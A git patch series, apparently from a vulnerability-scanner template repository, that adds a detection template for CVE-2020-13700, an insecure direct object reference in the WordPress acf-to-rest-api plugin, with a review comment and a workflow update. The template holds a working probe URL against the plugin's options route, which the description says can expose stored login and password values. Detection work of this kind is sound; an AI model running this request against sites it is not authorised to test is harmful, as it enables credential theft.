From 9fbbef2946684cb38816f5c2a1860d418a535c14 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Wed, 10 Mar 2021 04:14:33 +0000
Subject: [PATCH 1/3] Create CVE-2020-13700.yaml
---
cves/2020/CVE-2020-13700.yaml | 35 +++++++++++++++++++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 cves/2020/CVE-2020-13700.yaml
diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
new file mode 100644
index 0000000000..b230056dc8
--- /dev/null
+++ b/cves/2020/CVE-2020-13700.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-13700
+
+info:
+ name: WordPress IDOR
+ author: pikpikcu
+ severity: high
+ reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
+ description: |
+ An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
+ It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
+ wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+ tags: cve,cve2020,wordpress
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - 'Content-Type: application/json'
+ part: header
+
+ - type: word
+ words:
+ - 'acf-to-rest-api\/class-acf-to-rest-api.php'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 7010f6d81160501840ac7d289c2ae57aa4514b4a Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Wed, 10 Mar 2021 04:17:25 +0000
Subject: [PATCH 2/3] Update CVE-2020-13700.yaml
---
cves/2020/CVE-2020-13700.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
index b230056dc8..e11cafa032 100644
--- a/cves/2020/CVE-2020-13700.yaml
+++ b/cves/2020/CVE-2020-13700.yaml
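Review bot: In the new `cves/2020/CVE-2020-13700.yaml` (patch 1/3), the body matcher sets `condition: and` while listing a single entry under `words`, so the key has no effect and can be dropped. The template also does not say why the plugin's own path is the match string. A comment above the request, such as `# the probe appears to read the active plugin list through the options route; seeing the plugin path in the reply indicates wp_options values are being returned`, would make a hit easier to triage. Because the matchers key on the response rather than on a version, it is worth confirming against a release newer than 3.1.0 that the route no longer answers this way.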
@@ -23,7 +23,7 @@ requests: words: - 'Content-Type: application/json' part: header - + - type: word words: - 'acf-to-rest-api\/class-acf-to-rest-api.php' From f1d6d0ab1df6858c2b34d8a8d3863dcdd86bc1ff Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 12 Mar 2021 02:18:22 +0530 Subject: [PATCH 3/3] updated wp workflow --- cves/2020/CVE-2020-13700.yaml | 2 +- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml index e11cafa032..645363a779 100644 --- a/cves/2020/CVE-2020-13700.yaml +++ b/cves/2020/CVE-2020-13700.yaml @@ -1,7 +1,7 @@ id: CVE-2020-13700 info: - name: WordPress IDOR + name: acf-to-rest-api wordpress plugin IDOR author: pikpikcu severity: high reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 36be8a7c7b..9b91b0b0c8 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -24,6 +24,7 @@ workflows: - template: cves/2020/CVE-2020-11738.yaml - template: cves/2020/CVE-2020-24312.yaml - template: cves/2020/CVE-2020-25213.yaml + - template: cves/2020/CVE-2020-13700.yaml - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml - template: vulnerabilities/wordpress/sassy-social-share.yaml - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml